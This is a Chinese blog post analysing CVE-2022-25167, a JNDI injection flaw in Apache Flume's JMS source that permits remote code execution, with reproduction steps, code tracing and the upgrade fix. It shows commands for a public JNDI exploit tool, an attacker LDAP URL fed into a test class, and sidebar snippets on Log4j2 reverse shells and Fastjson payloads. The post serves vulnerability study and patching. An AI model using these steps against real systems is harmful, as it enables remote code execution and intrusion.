开源漏洞深度分析|CVE-2022-25167 JNDI命令执行漏洞

最新推荐文章于 2024-05-04 18:17:47 发布
最新推荐文章于 2024-05-04 18:17:47 发布
阅读量686 收藏
点赞数
分类专栏: 漏洞深度分析 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LJQClqjc/article/details/126710138
版权

项目介绍

Flume 是一种分布式、可靠且可用的服务,用于高效收集、聚合和移动大量日志数据。它具有基于流数据流的简单灵活的架构。它具有可调整的可靠性机制以及许多故障转移和恢复机制,具有健壮性和容错性。它使用允许在线分析应用程序的简单可扩展数据模型。

项目地址

Welcome to Apache Flume — Apache Flume

漏洞概述

当攻击者控制目标 LDAP 服务器时,如果配置使用带有 JNDI LDAP 数据源 URI 的 JMS 源,Apache Flume 版本 1.4.0 到 1.9.0 很容易受到 RCE 攻击[1]

影响版本

Apache Flume 1.4.0 - 1.9.0

环境搭建

下载部署即可

Index of /dist/flume/1.10.0

漏洞复现

该漏洞需要使用 JNDI工具辅助复现,可使用 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 工具。

工具链接:

GitHub - welk1n/JNDI-Injection-Exploit: JNDI注入测试工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)

命令如下所示:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a calculator"

终端开启监听,搭建 Flume 项目以 jdk1.8 环境运行 TestIntegrationActiveMQ 测试类即可

漏洞分析

查询官网披露信息可知,是由于 JMSSource 类没有进行验证,导致用户传入的数据被反序列化

搭建运行,idea默认生成的 Junit Application 并不能正常运行;先静态分析看一下

按照思路 diff 发现 JMSSource 1.10.0 在 doConfigure 中新增了调用 assertTure 的 uri 校验;转头去找 lookup

定位代码,connectionFactory 调用了 initialContext.lookup

 

看一下 lookup 的调用方法,传进 InitialContext#getURLOrDefaultInitCtx

lookup 拿到 name ,getURLScheme匹配 :和 /;之后获取链接内容,getURLContext 解释包含样例

For example, if the scheme id is "ldap", and the Context. URL_PKG_PREFIXES property contains "com.widget:com.wiz. jndi", the naming manager would attempt to load the following classes until one is successfully instantiated:
· com.widget.ldap.ldapURLContextFactory
· com.wiz.jndi.ldap.ldapURLContextFactory
· com.sun.jndi.url.ldap.ldapURLContextFactory

基本确定了,接下来尝试漏洞利用

 

context.put(JMSSourceConfiguration.DESTINATION_NAME,
            JNDI_PREFIX + DESTINATION_NAME);

项目未提供可将恶意参数传入漏洞触发位置的web界面或api,为了快速进行漏洞分析我们使用官方提供的测试类TestIntegrationActiveMQ, 可以使用该测试类进行漏洞复现与利用

可控参数传入位置在该类的 testQueueLocatedWithJndi 函数,里面只有上述两个 context.put;DESTINATION_NAME即为我们的入口点,name参数正是来自 DESTINATION_NAME ,因此需要在 TestIntegrationActiveMQ 中设置 DESTINATION_NAME 为 ldap 的链接;且需要更改 JNDI_PREFIX 为 ldap

converterClassName is : org.apache.flume.source.jms.DefaultJMSMessageConverter$Builder

destinationName+dynamicQueues/+test
destinationLocator+JNDI

按照这个尝试修改代码

TestIntegrationActiveMQ 中修改 DESTINATION_NAME 和 JNDI_PREFIX

 

运行测试发现 testQueueLocatedWithJndi 读入的 信息变成了 ldap://xxxxx:1389/h3puak 且 testQueueLocatedWithJndi 测试报错

context.put 变成

destinationName+ldap://+xxxxxx:1389/h3puak
destinationLocator+JNDI

 

按照漏洞复现步骤运行工具

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a calculator"

 

 

 

获取到 destinationName:ldap://x.x.x.x:1389/gttkny

 

 

收到 ldap了但没执行命令;idea项目Java版本换成 1.8 即可😂

修复方式

升级到 1.10.0 版本或按照 commite:dafb26ccb172141c6e14e95447e1b6ae38e9a7d0 修复相关代码

参考链接

[1] NVD - CVE-2022-25167
[2] FLUME-3416 - Improve input validation · apache/flume@dafb26c · GitHub
[3] [FLUME-3416] Improve input validation in JMSSource - ASF JIRA
[4] CVE-2022-25167 | Apache Flume JMS Source 权限升级

棱镜七彩
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
log4j2 JNDI注入漏洞问题复现
逗神的博客
12-13 4672
log4j2 JNDI注入漏洞问题复现
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
Apache Flume 远程代码执行漏洞CVE-2022-25167
murphysec的博客
06-14 2118
CVE-2022-25167漏洞是由于Apache Flume 的 JMSSource 类对配置的 JNDI LDAP 数据源中路径没有进行验证,导致不受信任的数据被反序列化。该漏洞影响范围小,漏洞等级中。影响版本为1.4.0到 1.9.0,官方已发布更新,建议用户更新到最新版本。参考链接: https://issues.apache.org/jira/browse/FLUME-3416 https://nvd.nist.gov/vuln/detail/CVE-2022-25167 https://secl
网络安全最新【漏洞复现】2(1)
最新发布
2401_84302796的博客
05-04 984
替换工具生成的payload:rmi://192.168.71.128:1099/mrflzc 到Burpsuite,其中生成的链接后面的codebaseClass是6位随机的,因为不希望工具生成的链接本身成为一种特征呗监控或拦截。服务器地址实际上就是codebase地址,相比于marshalsec中的JNDI server来说,这个工具把JNDI server和HTTP server绑定到一起,并自动启动HTTPserver返回相应class,更自动化了。开启新的窗口监听4444端口。
JNDI-Injection-Exploit
做你想做的人,没有时间的限制,只要愿意,什么时候都可以start。
12-12 3685
JNDI-Injection-Exploit工具比marshalsec要好用的多,相当于把http服务器和协议服务器放在了一起 github地址 https://github.com/welk1n/JNDI-Injection-Exploit.git 可以下载其release下的安装包 $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行命令
Linux kernel 释放后重用漏洞(Dirtycred POC已公开)
OSCS开源安全社区
09-22 665
OSCS(开源软件供应链安全社区)通过最快、最全的方式,发布开源项目最新的安全风险动态,包括开源组件安全漏洞、事件等信息。在Linux 内核的 net/sched/cls_route.c 实现的 route4_change 中发现了一个漏洞,该漏洞源于释放后重用,本地攻击者利用该漏洞会导致系统崩溃,可能会造成本地特权升级问题。Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。升级Linux_Kernel到 5.19 或更高版本。该漏洞已存在 POC。
从0到1java安全5
qq_29948489的博客
05-19 311
在前后端数据传输交互中,经常会遇到字符串(String)与json,XML等格式相互转换与解析,其中json以跨语言,跨前后端的优点在开发中被频繁使用,基本上是标准的数据交换格式。分析漏洞利用,输出转换的数据类型(类),有一个@type的参数,默认有但是不显示,这里使用 SerializerFeature.WriteClassName,来显示这个参数。我们IDEA设置Maven的时候可以看到,其实IDEA已经自带了Maven,直接配置IDEA中的Maven可以省去下载Maven的步骤了。
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
整合rmi和ldap服务器+恶意类,使用方法: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/Calculator.app") -A - the address of your server, maybe an IP address or a domain. (optional , default address is the first network interface address)
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
SpringCloud Function SpEL注入漏洞分析CVE-2022-22963).doc
07-08
SpringCloud Function SpEL 注入漏洞分析CVE-2022-22963) SpringCloud Function 是 Spring 提供的一套分布式函数式编程组件,旨在帮助开发者专注于业务逻辑实现,而不需要关心服务器环境运维等问题。然而,在 ...
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
2022年,Spring Framework 发现了一个严重的远程命令执行(RCE)漏洞,被称为CVE-2022-22965,也被称为“Spring4Shell”。这个漏洞对使用Spring Framework的应用程序构成了重大威胁,因为攻击者可以利用它来执行...
java asm jndi_JNDI-Injection-Exploit JNDI注入利用工具
weixin_36368271的博客
02-16 1944
介绍JNDI注入利用工具,生成JNDI链接并启动后端相关服务,可用于Fastjson、Jackson等相关使用可执行程序为jar包,在命令行中运行以下命令:$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]其中:-C - 远程class文件中要执行命令。(可选项 , 默认命令是...
Log4j2_RCE漏洞复现
Le1a's Blog
12-16 2006
log4j2_RCE漏洞复现 这里是用了两种工具来复现漏洞 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar方法 靶机地址:http://vulfocus.fofa.so/ 工具地址:https://www.lanzoup.com/i8Aa4xo5gmf 密码:Le1a 访问靶机地址 先把 工具上传到VPS上,然后运行 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,(b
Centos7服务器同步网络发现漏洞与修复手册(每周更新3次)
visket2008的专栏
10-18 2189
本文将长期更新基于centos7环境引起的操作系统、java、node、python等相关的漏洞修复解决方案。
Log4j2漏洞利用
weixin_52515588的博客
12-30 876
升级到最新的安全版本:log4j2-2.15.0-rc2。选用JNDI注入工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar。这里的命令是想要靶机运行的命令,-A 后放的是发出攻击的电脑的IP,也是存放-C后”命令”的IP地址。【我直接下载连接失败,就下载好了以后拉进来的,如果是直接下载的去对应目录下面找】在漏洞已存在的情况下,构造攻击payload执行命令反弹shell。监听界面出现反弹shell成功的界面:(进入了交互模式)实现反弹shell,可以使用命令
Log4j2远程命令执行CVE-2021-44228)
weixin_48817799的博客
01-25 1079
Log4j2远程命令执行CVE-2021-44228) 前言一、vulfocus靶场二、复现步骤1.靶场如下2.点击抓包 前言 Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。 一、vulfocus靶场 http://vulfocus.io.
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark 版本小于 3.0.3、3.1.1 到 3.1.2 以及 3.3.0 及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值